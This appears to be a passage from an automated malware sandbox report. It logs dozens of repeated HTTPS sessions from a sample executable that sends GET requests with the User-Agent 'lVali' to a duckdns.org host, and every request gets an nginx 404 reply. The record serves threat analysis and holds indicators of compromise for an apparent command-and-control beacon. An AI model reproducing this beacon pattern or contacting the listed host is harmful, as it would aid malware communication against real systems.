                2022-08-05 10:11:13 UTC19OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:13 UTC20INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:13 UTC20INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                48192.168.2.649830208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:13 UTC20OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:13 UTC20INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:13 UTC20INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                49192.168.2.649831208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:14 UTC20OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:14 UTC20INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:14 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:14 UTC21INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.649754208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:31 UTC2OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:31 UTC2INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:31 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:31 UTC2INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                50192.168.2.649832208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:15 UTC21OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:15 UTC21INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:15 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:15 UTC21INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                51192.168.2.649833208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:16 UTC21OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:16 UTC21INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:16 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:16 UTC21INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                52192.168.2.649834208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:17 UTC21OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:17 UTC22INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:17 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:17 UTC22INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                53192.168.2.649835208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:18 UTC22OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:18 UTC22INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:18 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:18 UTC22INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                54192.168.2.649837208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:20 UTC22OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:20 UTC22INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:20 UTC23INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                55192.168.2.649840208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:24 UTC23OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:24 UTC23INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:24 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:24 UTC23INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                56192.168.2.649841208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:25 UTC23OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:25 UTC23INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:25 UTC23INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                57192.168.2.649842208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:25 UTC24OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:25 UTC24INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:25 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:25 UTC24INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                58192.168.2.649843208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:26 UTC24OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:26 UTC24INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:26 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:26 UTC24INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                59192.168.2.649845208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:27 UTC24OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:27 UTC25INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:27 UTC25INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.649757208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:32 UTC2OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:32 UTC2INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:32 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:32 UTC2INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                60192.168.2.649846208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:29 UTC25OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:29 UTC25INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:29 UTC25INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                61192.168.2.649847208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:29 UTC25OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:29 UTC25INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:29 UTC26INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                62192.168.2.649848208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:30 UTC26OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:30 UTC26INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:30 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:30 UTC26INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                63192.168.2.649849208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:30 UTC26OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:30 UTC26INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:30 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:30 UTC26INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                64192.168.2.649850208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:31 UTC27OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:31 UTC27INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:31 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:31 UTC27INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


